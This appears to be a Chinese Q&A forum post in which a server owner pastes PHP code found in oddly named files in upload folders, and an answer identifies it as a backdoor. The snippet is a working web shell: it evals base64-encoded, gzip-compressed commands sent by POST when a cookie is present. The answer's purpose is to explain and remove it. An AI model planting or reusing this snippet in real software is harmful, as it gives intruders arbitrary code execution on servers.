我发现以下代码出现在我的服务器的多个网站上的两个相同的.PHP文件中.这些文件的名称不起眼,例如“reminder.PHP”(但每次都有不同的名称),并出现在我的/ scripts /和/ uploads /文件夹中,有时会出现在其他文件夹中.

它们的外观并非完全随机,但我对Apache服务器或PHP知之甚少知道a)它是如何实现的.b)它的作用.

检查日志它们都在相似的时间出现并被调用一次,就是这样.

任何帮助将不胜感激.

if (isset($_COOKIE["adm"])) {
    if (isset($_POST['crc'], $_POST['cmd'])) {
        if (sprintf('%u', crc32($_POST['cmd'])) == $_POST['crc']) {
            eval(gzuncompress(base64_decode($_POST['cmd'])));
        } else 
            echo "repeat_cmd";
    }
}

解决方法:

该文件允许恶意人员在您的系统上执行他们想要的任何PHP代码.

基本上,如果已经满足某些验证(即恶意人员具有给定的cookie值),它将采用POSTed“cmd”,base64解码它,gzip解压缩它,并将其评估为PHP.

我建议您更改密码,并重新安装apache以获得良好的衡量标准.也可以立即删除这些文件,或者如果可以远程删除,则从备份中恢复.